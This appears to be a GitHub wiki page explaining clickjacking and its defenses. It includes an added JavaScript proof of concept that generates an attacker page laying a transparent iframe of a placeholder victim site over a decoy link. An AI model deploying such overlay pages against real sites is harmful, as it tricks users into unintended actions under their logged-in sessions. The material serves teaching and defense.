Clickjacking - TairinySimeonato/WebAuditing GitHub Wiki

  • Clickjacking is an attack in which the victim is tricked into clicking something different from what they think they are clicking.
  • It works by embedding the target site (typically in an invisible <iframe>) in a page the attacker controls, so the click is delivered to the target without the user's knowledge.
  • For example: the user clicks what looks like a harmless button, but the click actually triggers an action on another site.

How does the attack work?

  1. A user visits a malicious page.
  2. The page contains a link that looks like it comes from a legitimate site ("Get your iPhone free now!!", for example).
  3. Over that link the evil website places a transparent <iframe> whose src points at facebook.com, positioned so that the “Like” button sits exactly on top of the link.
  4. When the visitor tries to click the link, they actually click the button and like something on Facebook. The browser sends the visitor's Facebook cookies with the framed page, so the action is performed as the logged-in user.
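The attacker page from the steps above, as an added example that is not part of this wiki page or the WebAuditing project. The function names, the sample coordinates and the placeholder URL https://victim.example/like?post=42 are assumptions made for illustration; the technique (a transparent, absolutely positioned iframe stacked above a visible decoy) is the one described above.

```javascript
// Added example for this wiki page, not code from the WebAuditing project.
// Assumptions: the function names, the sample coordinates and the placeholder URL
// https://victim.example/like?post=42 are all made up for illustration.
//
// The attack is pure HTML/CSS. The attacker page shows a tempting decoy link and
// lays a full-size, fully transparent <iframe> of the victim site over it. The
// iframe is shifted so that the button the attacker wants pressed sits exactly on
// top of the decoy, and a higher z-index makes sure the click reaches the iframe.
// The browser sends the victim's cookies with the framed request, so the click is
// performed as the logged-in user.

// Constructed sample geometry (CSS pixels from the top-left corner):
//   where the "Like" button is inside the framed victim page, and
//   where the decoy link is on the attacker page.
const VICTIM_BUTTON = { left: 620, top: 340, width: 80, height: 28 };
const DECOY_LINK = { left: 200, top: 150, width: 80, height: 28 };

// The iframe's top-left corner must be placed at (decoy - button) so that the
// button, which sits `victimButton` pixels inside the iframe, lands on the decoy.
function computeOverlayOffset(victimButton, decoyLink) {
  return {
    left: decoyLink.left - victimButton.left,
    top: decoyLink.top - victimButton.top,
  };
}

// Returns the complete attacker page as an HTML string.
function buildDecoyPage(victimUrl, victimButton, decoyLink) {
  const { left, top } = computeOverlayOffset(victimButton, decoyLink);
  return `<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style>
  /* The visible bait. */
  #decoy {
    position: absolute;
    left: ${decoyLink.left}px; top: ${decoyLink.top}px;
    width: ${decoyLink.width}px; height: ${decoyLink.height}px;
    z-index: 1;
  }
  /* The victim site: invisible (opacity 0 rather than display:none, so it
     still receives clicks) and stacked above the decoy. */
  #victim {
    position: absolute;
    left: ${left}px; top: ${top}px;
    width: 1200px; height: 900px;
    opacity: 0;
    z-index: 2;
    border: 0;
  }
</style>
</head>
<body>
  <a id="decoy" href="#">Get your iPhone free now!!</a>
  <iframe id="victim" src="${victimUrl}"></iframe>
</body>
</html>
`;
}

// Write the page to stdout; save it and open it in a browser to see the overlay
// (temporarily set opacity to 0.3 in the style above to watch the alignment).
console.log(buildDecoyPage('https://victim.example/like?post=42', VICTIM_BUTTON, DECOY_LINK));
```

Against a target that sends no framing protection the framed page renders normally inside the invisible iframe; against one that sends X-Frame-Options or a frame-ancestors policy the browser refuses to render it and the click lands on the decoy link instead.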

Defenses

  • Instruct the browser not to allow framing from other domains: send the response header X-Frame-Options: SAMEORIGIN (or DENY), plus the Content-Security-Policy frame-ancestors directive, which is its modern replacement and also accepts an allow-list of origins. This is the defense that actually holds.
  • As a fallback only, employ defensive code in the user interface that checks that the current frame is the top-level window (self === top) and keeps the page hidden otherwise. Script-based frame-busting can be neutralised by the attacker (for example with the iframe sandbox attribute), so it must not be relied on by itself.
